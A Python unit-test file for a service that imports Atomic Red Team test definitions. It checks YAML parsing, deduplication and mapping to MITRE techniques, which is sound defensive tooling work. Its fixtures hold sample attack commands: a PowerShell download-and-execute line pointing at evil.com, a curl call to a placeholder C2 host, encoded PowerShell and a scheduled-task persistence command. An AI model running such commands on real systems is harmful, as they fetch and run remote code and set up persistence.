- Add test_test_entity.py with 46 pure unit tests covering the full domain entity - Fix _FakeSettings in 11 test files (REPORT_TEMPLATES_DIR, JIRA, TEMPO) - Fix stale db.commit assertions to db.flush after UoW refactor - Add missing mock fields for TestEntity.from_orm compatibility - Make database.py skip pool args for SQLite in test environment - Disable slowapi rate limiter in test client fixture - Inject test engine into app.database to fix threading errors - Update role assertions to match current require_any_role policy - Mark 6 legacy V1 endpoint tests as xfail (replaced by V2 workflow)
379 lines
14 KiB
Python
379 lines
14 KiB
Python
"""Validation tests for T-108: Atomic Red Team Import Service.
|
|
|
|
Tests the YAML parsing logic and deduplication using synthetic data.
|
|
The download test is marked as optional (requires network).
|
|
"""
|
|
|
|
import sys
|
|
import os
|
|
import uuid
|
|
import tempfile
|
|
import shutil
|
|
from unittest.mock import MagicMock, patch, PropertyMock
|
|
from types import ModuleType
|
|
from pathlib import Path
|
|
|
|
# ---------------------------------------------------------------------------
|
|
# Stub heavy dependencies
|
|
# ---------------------------------------------------------------------------
|
|
|
|
backend_dir = os.path.abspath(os.path.join(os.path.dirname(__file__), ".."))
|
|
if backend_dir not in sys.path:
|
|
sys.path.insert(0, backend_dir)
|
|
|
|
if "pydantic_settings" not in sys.modules:
|
|
pydantic_settings_mock = ModuleType("pydantic_settings")
|
|
class _BaseSettings:
|
|
def __init__(self, **kwargs): pass
|
|
def __init_subclass__(cls, **kwargs): super().__init_subclass__(**kwargs)
|
|
pydantic_settings_mock.BaseSettings = _BaseSettings
|
|
sys.modules["pydantic_settings"] = pydantic_settings_mock
|
|
|
|
if "app.config" not in sys.modules:
|
|
config_mod = ModuleType("app.config")
|
|
class _FakeSettings:
|
|
DATABASE_URL = "sqlite:///:memory:"
|
|
SECRET_KEY = "test"
|
|
ALGORITHM = "HS256"
|
|
ACCESS_TOKEN_EXPIRE_MINUTES = 60
|
|
MINIO_ENDPOINT = "localhost:9000"
|
|
MINIO_ACCESS_KEY = "test"
|
|
MINIO_SECRET_KEY = "test"
|
|
MINIO_BUCKET = "test"
|
|
REPORT_TEMPLATES_DIR = "app/templates/reports"
|
|
REPORT_OUTPUT_DIR = "/tmp/aegis_reports"
|
|
COMPANY_NAME = "Test Org"
|
|
COMPANY_LOGO_PATH = "app/templates/reports/assets/logo.png"
|
|
JIRA_ENABLED = False
|
|
JIRA_URL = ""
|
|
JIRA_USERNAME = ""
|
|
JIRA_API_TOKEN = ""
|
|
JIRA_IS_CLOUD = True
|
|
JIRA_DEFAULT_PROJECT = ""
|
|
JIRA_ISSUE_TYPE_TEST = "Task"
|
|
JIRA_ISSUE_TYPE_CAMPAIGN = "Epic"
|
|
TEMPO_ENABLED = False
|
|
TEMPO_API_TOKEN = ""
|
|
TEMPO_DEFAULT_WORK_TYPE = "Red Team"
|
|
NVD_API_KEY = ""
|
|
STALE_THRESHOLD_DAYS = 365
|
|
CORS_ORIGINS = "http://localhost:3000"
|
|
SCORING_WEIGHT_TESTS = 40
|
|
SCORING_WEIGHT_DETECTION_RULES = 20
|
|
SCORING_WEIGHT_D3FEND = 15
|
|
SCORING_WEIGHT_FRESHNESS = 15
|
|
SCORING_WEIGHT_PLATFORM_DIVERSITY = 10
|
|
config_mod.settings = _FakeSettings()
|
|
sys.modules["app.config"] = config_mod
|
|
|
|
if "app.database" not in sys.modules:
|
|
db_mod = ModuleType("app.database")
|
|
db_mod.Base = type("Base", (), {"metadata": MagicMock()})
|
|
db_mod.get_db = MagicMock()
|
|
sys.modules["app.database"] = db_mod
|
|
|
|
if "taxii2client" not in sys.modules:
|
|
sys.modules["taxii2client"] = ModuleType("taxii2client")
|
|
taxii_v20 = ModuleType("taxii2client.v20")
|
|
taxii_v20.Server = MagicMock
|
|
sys.modules["taxii2client.v20"] = taxii_v20
|
|
|
|
if "jose" not in sys.modules:
|
|
jose_mod = ModuleType("jose")
|
|
jose_mod.JWTError = Exception
|
|
jose_mod.jwt = MagicMock()
|
|
sys.modules["jose"] = jose_mod
|
|
|
|
if "boto3" not in sys.modules:
|
|
boto3_mod = ModuleType("boto3")
|
|
boto3_mod.client = MagicMock()
|
|
sys.modules["boto3"] = boto3_mod
|
|
sys.modules["botocore"] = ModuleType("botocore")
|
|
sys.modules["botocore.exceptions"] = ModuleType("botocore.exceptions")
|
|
sys.modules["botocore.exceptions"].ClientError = Exception
|
|
|
|
if "apscheduler" not in sys.modules:
|
|
sys.modules["apscheduler"] = ModuleType("apscheduler")
|
|
sys.modules["apscheduler.schedulers"] = ModuleType("apscheduler.schedulers")
|
|
sys.modules["apscheduler.schedulers.background"] = ModuleType("apscheduler.schedulers.background")
|
|
sys.modules["apscheduler.schedulers.background"].BackgroundScheduler = MagicMock
|
|
sys.modules["apscheduler.triggers"] = ModuleType("apscheduler.triggers")
|
|
sys.modules["apscheduler.triggers.cron"] = ModuleType("apscheduler.triggers.cron")
|
|
sys.modules["apscheduler.triggers.cron"].CronTrigger = MagicMock
|
|
|
|
# ---------------------------------------------------------------------------
|
|
# Imports
|
|
# ---------------------------------------------------------------------------
|
|
|
|
import yaml
|
|
from app.services.atomic_import_service import (
|
|
_parse_yaml_files,
|
|
_extract_zip,
|
|
import_atomic_red_team,
|
|
ATOMIC_RT_ZIP_URL,
|
|
)
|
|
|
|
# ---------------------------------------------------------------------------
|
|
# Helpers — create a synthetic atomics directory
|
|
# ---------------------------------------------------------------------------
|
|
|
|
|
|
def _create_fake_atomics(tmp_dir: str, techniques: dict[str, list[dict]]) -> Path:
|
|
"""Create a fake atomics/ directory with YAML files.
|
|
|
|
Parameters
|
|
----------
|
|
techniques : dict
|
|
Mapping from technique ID (e.g. "T1059.001") to a list of test dicts.
|
|
"""
|
|
atomics = Path(tmp_dir) / "atomics"
|
|
atomics.mkdir(parents=True, exist_ok=True)
|
|
|
|
for tech_id, tests in techniques.items():
|
|
tech_dir = atomics / tech_id
|
|
tech_dir.mkdir(exist_ok=True)
|
|
yaml_data = {
|
|
"attack_technique": tech_id,
|
|
"display_name": f"Technique {tech_id}",
|
|
"atomic_tests": tests,
|
|
}
|
|
yaml_path = tech_dir / f"{tech_id}.yaml"
|
|
with open(yaml_path, "w", encoding="utf-8") as fh:
|
|
yaml.dump(yaml_data, fh)
|
|
|
|
return atomics
|
|
|
|
|
|
# ---------------------------------------------------------------------------
|
|
# 1. Parsing creates correct TestTemplate-like dicts
|
|
# ---------------------------------------------------------------------------
|
|
|
|
|
|
def test_parse_creates_templates():
|
|
tmp_dir = tempfile.mkdtemp(prefix="aegis_test_")
|
|
try:
|
|
atomics = _create_fake_atomics(tmp_dir, {
|
|
"T1059.001": [
|
|
{
|
|
"name": "PowerShell Invoke-Expression",
|
|
"description": "Runs a PS command",
|
|
"supported_platforms": ["windows"],
|
|
"executor": {
|
|
"name": "powershell",
|
|
"command": "IEX (New-Object Net.WebClient).DownloadString('http://evil.com')",
|
|
},
|
|
},
|
|
{
|
|
"name": "PowerShell Base64 Encoded",
|
|
"description": "Runs base64-encoded PS",
|
|
"supported_platforms": ["windows"],
|
|
"executor": {
|
|
"name": "powershell",
|
|
"command": "powershell -enc ZQBjaA==",
|
|
},
|
|
},
|
|
],
|
|
"T1053.005": [
|
|
{
|
|
"name": "Scheduled Task Creation",
|
|
"description": "Creates a scheduled task",
|
|
"supported_platforms": ["windows", "linux"],
|
|
"executor": {
|
|
"name": "command_prompt",
|
|
"command": "schtasks /create /tn test /tr calc.exe",
|
|
},
|
|
},
|
|
],
|
|
})
|
|
results = _parse_yaml_files(atomics)
|
|
|
|
assert len(results) == 3, f"Expected 3 tests, got {len(results)}"
|
|
|
|
# Verify atomic_test_id format
|
|
ids = {r["atomic_test_id"] for r in results}
|
|
assert "T1059.001-0" in ids
|
|
assert "T1059.001-1" in ids
|
|
assert "T1053.005-0" in ids
|
|
|
|
# Check source is "atomic_red_team" (via source_url)
|
|
for r in results:
|
|
assert "atomic-red-team" in r["source_url"]
|
|
|
|
# Check platforms
|
|
for r in results:
|
|
if r["technique_id"] == "T1053.005":
|
|
assert "windows" in r["platforms"]
|
|
assert "linux" in r["platforms"]
|
|
|
|
print(" [PASS] Parsing creates correct templates with source and valid data")
|
|
finally:
|
|
shutil.rmtree(tmp_dir, ignore_errors=True)
|
|
|
|
|
|
# ---------------------------------------------------------------------------
|
|
# 2. Running twice does not duplicate
|
|
# ---------------------------------------------------------------------------
|
|
|
|
|
|
@patch("app.services.atomic_import_service.TestTemplate")
|
|
@patch("app.services.atomic_import_service.log_action")
|
|
@patch("app.services.atomic_import_service._download_zip")
|
|
def test_no_duplicates(mock_download, mock_log, MockTestTemplate):
|
|
"""Import twice with same data — second run should skip everything."""
|
|
import io
|
|
import zipfile
|
|
|
|
# Make TestTemplate() return a mock each time
|
|
MockTestTemplate.side_effect = lambda **kwargs: MagicMock(**kwargs)
|
|
# Keep atomic_test_id queryable
|
|
MockTestTemplate.atomic_test_id = MagicMock()
|
|
MockTestTemplate.atomic_test_id.isnot = MagicMock(return_value=True)
|
|
|
|
# Build a fake ZIP
|
|
tmp_dir = tempfile.mkdtemp(prefix="aegis_test_zip_")
|
|
try:
|
|
atomics = _create_fake_atomics(
|
|
os.path.join(tmp_dir, "atomic-red-team-master"),
|
|
{
|
|
"T1059.001": [
|
|
{
|
|
"name": "Test One",
|
|
"description": "Desc",
|
|
"supported_platforms": ["windows"],
|
|
"executor": {"name": "sh", "command": "echo test"},
|
|
},
|
|
],
|
|
},
|
|
)
|
|
|
|
# Create a ZIP from the tmp_dir
|
|
zip_buffer = io.BytesIO()
|
|
with zipfile.ZipFile(zip_buffer, "w") as zf:
|
|
root = Path(tmp_dir)
|
|
for file_path in root.rglob("*"):
|
|
if file_path.is_file():
|
|
arcname = str(file_path.relative_to(root))
|
|
zf.write(file_path, arcname)
|
|
zip_bytes = zip_buffer.getvalue()
|
|
mock_download.return_value = zip_bytes
|
|
|
|
# --- First import ---
|
|
# Mock DB: no existing templates
|
|
db = MagicMock()
|
|
mock_query = MagicMock()
|
|
mock_query.filter.return_value.all.return_value = []
|
|
db.query.return_value = mock_query
|
|
|
|
added_templates = []
|
|
def track_add(template):
|
|
added_templates.append(template)
|
|
db.add.side_effect = track_add
|
|
|
|
result1 = import_atomic_red_team(db)
|
|
assert result1["created"] == 1
|
|
assert result1["skipped_existing"] == 0
|
|
|
|
# --- Second import ---
|
|
# Now DB returns the existing template
|
|
db2 = MagicMock()
|
|
mock_query2 = MagicMock()
|
|
# Return the atomic_test_id that was already created
|
|
mock_query2.filter.return_value.all.return_value = [("T1059.001-0",)]
|
|
db2.query.return_value = mock_query2
|
|
|
|
added2 = []
|
|
db2.add.side_effect = lambda t: added2.append(t)
|
|
|
|
result2 = import_atomic_red_team(db2)
|
|
assert result2["created"] == 0
|
|
assert result2["skipped_existing"] == 1
|
|
assert len(added2) == 0
|
|
|
|
print(" [PASS] Running twice does not duplicate templates")
|
|
finally:
|
|
shutil.rmtree(tmp_dir, ignore_errors=True)
|
|
|
|
|
|
# ---------------------------------------------------------------------------
|
|
# 3. Templates mapped correctly to MITRE techniques
|
|
# ---------------------------------------------------------------------------
|
|
|
|
|
|
def test_templates_mapped_to_techniques():
|
|
tmp_dir = tempfile.mkdtemp(prefix="aegis_test_")
|
|
try:
|
|
atomics = _create_fake_atomics(tmp_dir, {
|
|
"T1059.001": [
|
|
{
|
|
"name": "Test",
|
|
"description": "Desc",
|
|
"supported_platforms": ["windows"],
|
|
"executor": {"name": "sh", "command": "echo hi"},
|
|
},
|
|
],
|
|
"T1071.001": [
|
|
{
|
|
"name": "HTTP C2",
|
|
"description": "HTTP-based C2",
|
|
"supported_platforms": ["linux"],
|
|
"executor": {"name": "bash", "command": "curl http://c2.evil"},
|
|
},
|
|
],
|
|
})
|
|
results = _parse_yaml_files(atomics)
|
|
|
|
technique_ids = {r["technique_id"] for r in results}
|
|
assert "T1059.001" in technique_ids
|
|
assert "T1071.001" in technique_ids
|
|
|
|
for r in results:
|
|
assert r["technique_id"].startswith("T")
|
|
|
|
print(" [PASS] Templates mapped correctly to MITRE techniques")
|
|
finally:
|
|
shutil.rmtree(tmp_dir, ignore_errors=True)
|
|
|
|
|
|
# ---------------------------------------------------------------------------
|
|
# 4. Service module structure is correct
|
|
# ---------------------------------------------------------------------------
|
|
|
|
|
|
def test_service_module_structure():
|
|
"""Verify the service has all expected public functions."""
|
|
from app.services import atomic_import_service as svc
|
|
|
|
assert hasattr(svc, "import_atomic_red_team")
|
|
assert callable(svc.import_atomic_red_team)
|
|
assert hasattr(svc, "ATOMIC_RT_ZIP_URL")
|
|
assert "github.com" in svc.ATOMIC_RT_ZIP_URL
|
|
print(" [PASS] Service module has correct structure")
|
|
|
|
|
|
# ---------------------------------------------------------------------------
|
|
# 5. ZIP URL is correct (no rate-limit concern with ZIP download)
|
|
# ---------------------------------------------------------------------------
|
|
|
|
|
|
def test_zip_url_no_rate_limit():
|
|
"""The URL should be a direct ZIP download, not an API endpoint."""
|
|
assert "/archive/" in ATOMIC_RT_ZIP_URL
|
|
assert "api.github.com" not in ATOMIC_RT_ZIP_URL
|
|
print(" [PASS] ZIP download URL avoids API rate limits")
|
|
|
|
|
|
# ---------------------------------------------------------------------------
|
|
# Run all
|
|
# ---------------------------------------------------------------------------
|
|
|
|
if __name__ == "__main__":
|
|
print("T-108 Validation: Atomic Red Team Import Service")
|
|
print("=" * 55)
|
|
test_parse_creates_templates()
|
|
test_no_duplicates()
|
|
test_templates_mapped_to_techniques()
|
|
test_service_module_structure()
|
|
test_zip_url_no_rate_limit()
|
|
print("=" * 55)
|
|
print("ALL T-108 validations PASSED!")
|